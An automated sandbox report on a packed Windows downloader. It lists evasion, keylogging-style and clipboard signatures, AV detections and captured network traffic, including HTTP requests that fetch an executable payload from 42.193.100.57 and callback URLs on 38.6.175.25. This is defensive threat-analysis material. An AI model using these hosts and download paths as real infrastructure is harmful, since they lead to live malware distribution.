Windows Analysis Report
#U4fdd#U62a4#U795e1.exe

Overview

General Information

Sample name: #U4fdd#U62a4#U795e1.exe
renamed because original name is a hash value
Original sample name: 1.exe
Analysis ID: 1559170
MD5: f5b663e9aa9555b45bd9e88221083781
SHA1: 3df73ded0310c3e70ce430118ced5073f75e0cc1
SHA256: 2db7d9e24396db62672a83f5245a154a8b58d2099554aaa93ad2dcef1f18c513
Tags: exe, opendir, user-Joker

Detection

Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Contains functionality to detect sleep reduction / modifications
Detected VMProtect packer
Machine Learning detection for dropped file
Machine Learning detection for sample
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
PE file has a writeable .text section
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Contains functionality for read data from the clipboard
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates processes with suspicious names
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
May check if the current machine is a sandbox (GetTickCount - Sleep)
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection

Source: C:\Users\user\Desktop\ 16.exe ReversingLabs: Detection: 28%
Source: C:\Users\user\Desktop\update.exe ReversingLabs: Detection: 60%
Source: #U4fdd#U62a4#U795e1.exe ReversingLabs: Detection: 47%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\Desktop\update.exe Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\ 16.exe Joe Sandbox ML: detected
Source: #U4fdd#U62a4#U795e1.exe Joe Sandbox ML: detected
Source: #U4fdd#U62a4#U795e1.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_004801E0 lstrcpyA,FindFirstFileA,GetLastError,SetLastError, 0_2_004801E0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_004927A8 __EH_prolog,GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA, 0_2_004927A8
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00423610 FindFirstFileA,FindClose, 0_2_00423610
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_0041B240 FindNextFileA,FindClose,FindFirstFileA,FindClose, 0_2_0041B240
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00411EF0 FindFirstFileA,SendMessageA,SendMessageA,FindNextFileA,FindClose,SendMessageA, 0_2_00411EF0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_004801E0 lstrcpyA,FindFirstFileA,GetLastError,SetLastError, 3_2_004801E0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_004927A8 __EH_prolog,GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA, 3_2_004927A8
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00423610 FindFirstFileA,FindClose, 3_2_00423610
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_0041B240 FindNextFileA,FindClose,FindFirstFileA,FindClose, 3_2_0041B240
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00411EF0 FindFirstFileA,SendMessageA,SendMessageA,FindNextFileA,FindClose,SendMessageA, 3_2_00411EF0
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_004929E2 __EH_prolog,GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA, 7_2_004929E2
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_00438DA0 FindNextFileA,FindClose,FindFirstFileA,FindClose, 7_2_00438DA0
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_0043BF10 FindFirstFileA,FindClose, 7_2_0043BF10
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_0042FF90 FindFirstFileA,SendMessageA,SendMessageA,FindNextFileA,FindClose,SendMessageA, 7_2_0042FF90
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 4x nop then push esi 0_2_0041F502
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 4x nop then push esi 3_2_0041F502
Source: global traffic TCP traffic: 192.168.2.11:49711 -> 38.6.175.134:9901
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Tue, 23 Jul 2024 08:08:40 GMTAccept-Ranges: bytesETag: "db12387d7dcda1:0"Server: Microsoft-IIS/8.5Date: Wed, 20 Nov 2024 08:14:44 GMTContent-Length: 6123520Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 25 59 9f 66 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 a0 11 00 00 00 2b 00 00 00 00 00 fe 77 76 00 00 10 00 00 00 b0 11 00 00 00 40 00 00 10 00 00 00 10 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 a0 c5 00 00 10 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 fc 98 c4 00 68 01 00 00 00 10 c5 00 b5 8b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 bd 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d6 9f 11 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 78 53 27 00 00 b0 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 08 e2 05 00 00 10 39 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 76 6d 70 30 00 00 00 0a 36 29 00 00 00 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 60 2e 76 6d 70 31 00 00 00 c0 c3 5c 00 00 40 68 00 00 d0 5c 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 
00 00 60 2e 72 73 72 63 00 00 00 b5 8b 00 00 00 10 c5 00 00 90 00 00 00 e0 5c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Tue, 23 Jul 2024 08:08:40 GMTAccept-Ranges: bytesETag: "db12387d7dcda1:0"Server: Microsoft-IIS/8.5Date: Wed, 20 Nov 2024 08:14:45 GMTContent-Length: 6123520Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 25 59 9f 66 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 a0 11 00 00 00 2b 00 00 00 00 00 fe 77 76 00 00 10 00 00 00 b0 11 00 00 00 40 00 00 10 00 00 00 10 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 a0 c5 00 00 10 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 fc 98 c4 00 68 01 00 00 00 10 c5 00 b5 8b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 bd 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d6 9f 11 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 78 53 27 00 00 b0 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 08 e2 05 00 00 10 39 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 76 6d 70 30 00 00 00 0a 36 29 00 00 00 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 60 2e 76 6d 70 31 00 00 00 c0 c3 5c 00 00 40 68 00 00 d0 5c 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 
00 00 60 2e 72 73 72 63 00 00 00 b5 8b 00 00 00 10 c5 00 00 90 00 00 00 e0 5c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Tue, 23 Jul 2024 08:08:40 GMTAccept-Ranges: bytesETag: "db12387d7dcda1:0"Server: Microsoft-IIS/8.5Date: Wed, 20 Nov 2024 08:14:58 GMTContent-Length: 6123520Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 25 59 9f 66 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 a0 11 00 00 00 2b 00 00 00 00 00 fe 77 76 00 00 10 00 00 00 b0 11 00 00 00 40 00 00 10 00 00 00 10 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 a0 c5 00 00 10 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 fc 98 c4 00 68 01 00 00 00 10 c5 00 b5 8b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 bd 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d6 9f 11 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 78 53 27 00 00 b0 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 08 e2 05 00 00 10 39 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 76 6d 70 30 00 00 00 0a 36 29 00 00 00 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 60 2e 76 6d 70 31 00 00 00 c0 c3 5c 00 00 40 68 00 00 d0 5c 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 
00 00 60 2e 72 73 72 63 00 00 00 b5 8b 00 00 00 10 c5 00 00 90 00 00 00 e0 5c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: GET /%E5%8D%83%E5%8D%83%E6%99%9A%E6%98%9F16.exe HTTP/1.1Host: 42.193.100.57Cache-Control: no-cache
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.11:49702 -> 42.193.100.57:80
Source: global traffic HTTP traffic detected: GET /%E4%BF%9D%E6%8A%A4%E7%A5%9E.txt HTTP/1.1Accept: */*Referer: http://42.193.100.57/%E4%BF%9D%E6%8A%A4%E7%A5%9E.txtAccept-Language: zh-cnUser-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)Host: 42.193.100.57Cache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 42.193.100.57 (50 identical entries)
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_004071EA InternetOpenUrlA,InternetReadFile, 0_2_004071EA
Source: global traffic HTTP traffic detected: GET /%E4%BF%9D%E6%8A%A4%E7%A5%9E.txt HTTP/1.1Accept: */*Referer: http://42.193.100.57/%E4%BF%9D%E6%8A%A4%E7%A5%9E.txtAccept-Language: zh-cnUser-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)Host: 42.193.100.57Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /%E5%8D%83%E5%8D%83%E6%99%9A%E6%98%9F16.exe HTTP/1.1User-Agent: Agent7207437Host: 42.193.100.57Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /%E5%8D%83%E5%8D%83%E6%99%9A%E6%98%9F16.exe HTTP/1.1Host: 42.193.100.57Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /%E4%BF%9D%E6%8A%A4%E7%A5%9E.txt HTTP/1.1Accept: */*Referer: http://42.193.100.57/%E4%BF%9D%E6%8A%A4%E7%A5%9E.txtAccept-Language: zh-cnUser-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)Host: 42.193.100.57Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /%E5%8D%83%E5%8D%83%E6%99%9A%E6%98%9F16.exe HTTP/1.1User-Agent: Agent7220484Host: 42.193.100.57Cache-Control: no-cache
Source: #U4fdd#U62a4#U795e1.exe String found in binary or memory: http://.httpsset-cookie:;;
Source: 16.exe, 00000004.00000002.1879881423.00000000005FB000.00000002.00000001.01000000.00000007.sdmp, 16.exe, 00000004.00000002.1882768972.00000000013AD000.00000004.00000020.00020000.00000000.sdmp, update.exe, 00000007.00000002.1905145272.0000000002160000.00000004.00000020.00020000.00000000.sdmp, update.exe, 00000007.00000002.1905224498.00000000021A0000.00000004.00000020.00020000.00000000.sdmp, update.exe, 00000007.00000002.1904789983.0000000000660000.00000004.00000020.00020000.00000000.sdmp, update.exe, 00000007.00000002.1904789983.000000000067D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://38.6.175.25:901
Source: update.exe, 00000007.00000002.1904789983.0000000000660000.00000004.00000020.00020000.00000000.sdmp, update.exe, 00000007.00000002.1904226340.00000000001E0000.00000004.00000020.00020000.00000000.sdmp, update.exe, 00000007.00000002.1904789983.000000000067D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://38.6.175.25:901/down
Source: update.exe, 00000007.00000002.1904789983.000000000067D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://38.6.175.25:901/downLq
Source: update.exe, 00000007.00000002.1905145272.0000000002160000.00000004.00000020.00020000.00000000.sdmp, update.exe, 00000007.00000002.1905224498.00000000021A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://38.6.175.25:901/downhttp://38.6.175.25:901
Source: 16.exe, 00000004.00000002.1882225013.000000000134E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://38.6.175.25:901/downt
Source: update.exe, 00000007.00000002.1904789983.0000000000660000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://38.6.175.25:9018
Source: 16.exe, 00000004.00000003.1877794042.0000000002D51000.00000004.00000020.00020000.00000000.sdmp, update.exe, 00000007.00000002.1904789983.0000000000660000.00000004.00000020.00020000.00000000.sdmp, update.exe, 00000007.00000002.1904226340.00000000001E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://38.6.175.25:901C:
Source: #U4fdd#U62a4#U795e1.exe, 00000003.00000002.2714909833.0000000000666000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://42.193.100.57/
Source: #U4fdd#U62a4#U795e1.exe String found in binary or memory: http://42.193.100.57/%E4%BF%9D%E6%8A%A4%E7%A5%9E.txt
Source: #U4fdd#U62a4#U795e1.exe, 00000000.00000002.2714731411.00000000006E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://42.193.100.57/%E4%BF%9D%E6%8A%A4%E7%A5%9E.txt(
Source: #U4fdd#U62a4#U795e1.exe, 00000003.00000002.2714909833.000000000067C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://42.193.100.57/%E4%BF%9D%E6%8A%A4%E7%A5%9E.txt-U
Source: #U4fdd#U62a4#U795e1.exe, 00000000.00000002.2714731411.00000000006E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://42.193.100.57/%E4%BF%9D%E6%8A%A4%E7%A5%9E.txtKB-
Source: #U4fdd#U62a4#U795e1.exe, 00000000.00000002.2714731411.00000000006E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://42.193.100.57/%E4%BF%9D%E6%8A%A4%E7%A5%9E.txtSB5
Source: #U4fdd#U62a4#U795e1.exe, 00000000.00000002.2714731411.00000000006E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://42.193.100.57/%E4%BF%9D%E6%8A%A4%E7%A5%9E.txtY
Source: #U4fdd#U62a4#U795e1.exe, 00000000.00000002.2714731411.0000000000743000.00000004.00000020.00020000.00000000.sdmp, #U4fdd#U62a4#U795e1.exe, 00000003.00000002.2714909833.000000000063E000.00000004.00000020.00020000.00000000.sdmp, #U4fdd#U62a4#U795e1.exe, 00000003.00000002.2714909833.000000000067C000.00000004.00000020.00020000.00000000.sdmp, ???[1].txt.0.dr, ???[1].txt.3.dr String found in binary or memory: http://42.193.100.57/%E5%8D%83%E5%8D%83%E6%99%9A%E6%98%9F16.exe
Source: #U4fdd#U62a4#U795e1.exe, 00000000.00000002.2714731411.0000000000729000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://42.193.100.57/%E5%8D%83%E5%8D%83%E6%99%9A%E6%98%9F16.exe#
Source: #U4fdd#U62a4#U795e1.exe, 00000003.00000002.2714909833.000000000067C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://42.193.100.57/%E5%8D%83%E5%8D%83%E6%99%9A%E6%98%9F16.exe(
Source: #U4fdd#U62a4#U795e1.exe, 00000003.00000002.2714909833.000000000067C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://42.193.100.57/%E5%8D%83%E5%8D%83%E6%99%9A%E6%98%9F16.exe1Z
Source: #U4fdd#U62a4#U795e1.exe, 00000003.00000002.2714909833.000000000063E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://42.193.100.57/%E5%8D%83%E5%8D%83%E6%99%9A%E6%98%9F16.exe7
Source: #U4fdd#U62a4#U795e1.exe, 00000000.00000002.2714731411.0000000000743000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://42.193.100.57/%E5%8D%83%E5%8D%83%E6%99%9A%E6%98%9F16.exe=2
Source: #U4fdd#U62a4#U795e1.exe, 00000000.00000002.2714731411.0000000000743000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://42.193.100.57/%E5%8D%83%E5%8D%83%E6%99%9A%E6%98%9F16.exeN2
Source: #U4fdd#U62a4#U795e1.exe, 00000000.00000002.2714731411.0000000000743000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://42.193.100.57/%E5%8D%83%E5%8D%83%E6%99%9A%E6%98%9F16.exec3
Source: #U4fdd#U62a4#U795e1.exe, 00000003.00000002.2714909833.000000000067C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://42.193.100.57/%E5%8D%83%E5%8D%83%E6%99%9A%E6%98%9F16.execY
Source: #U4fdd#U62a4#U795e1.exe, 00000000.00000002.2714731411.0000000000729000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://42.193.100.57/%E5%8D%83%E5%8D%83%E6%99%9A%E6%98%9F16.exez
Source: #U4fdd#U62a4#U795e1.exe, 00000000.00000002.2714731411.0000000000729000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://42.193.100.57/%E5%8D%83%E5%8D%83%E6%99%9A%E6%98%9F16.exe~
Source: #U4fdd#U62a4#U795e1.exe, update.exe.4.dr, 16.exe.0.dr String found in binary or memory: http://www.eyuyan.com)DVarFileInfo$
Source: 16.exe, 00000004.00000002.1882625896.0000000001369000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://trustsing.com/publish/iDefender.exew
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00437920 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,GlobalFree,EmptyClipboard,SetClipboardData,CloseClipboard, 0_2_00437920
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00437920 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,GlobalFree,EmptyClipboard,SetClipboardData,CloseClipboard, 3_2_00437920
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_00452E80 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,GlobalFree,EmptyClipboard,SetClipboardData,CloseClipboard, 7_2_00452E80
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00437A80 OpenClipboard,GetClipboardData,CloseClipboard,GlobalSize,GlobalLock,GlobalUnlock,CloseClipboard, 0_2_00437A80
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00436180 GetKeyState,GetKeyState,GetKeyState,CopyRect, 0_2_00436180
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00496E82 GetKeyState,GetKeyState,GetKeyState,GetKeyState, 0_2_00496E82
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_0049535B GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA, 0_2_0049535B
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_004237C0 GetKeyState,GetKeyState,GetKeyState,GetKeyState, 0_2_004237C0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00421AA0 IsWindowEnabled,TranslateAcceleratorA,IsChild,GetFocus,PostMessageA,PostMessageA,SendMessageA,IsChild,IsWindow,IsWindowVisible,SendMessageA,SendMessageA,SendMessageA,SendMessageA,GetParent,SendMessageA,WinHelpA,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,IsWindow, 0_2_00421AA0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00436180 GetKeyState,GetKeyState,GetKeyState,CopyRect, 3_2_00436180
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00496E82 GetKeyState,GetKeyState,GetKeyState,GetKeyState, 3_2_00496E82
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_0049535B GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA, 3_2_0049535B
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_004237C0 GetKeyState,GetKeyState,GetKeyState,GetKeyState, 3_2_004237C0
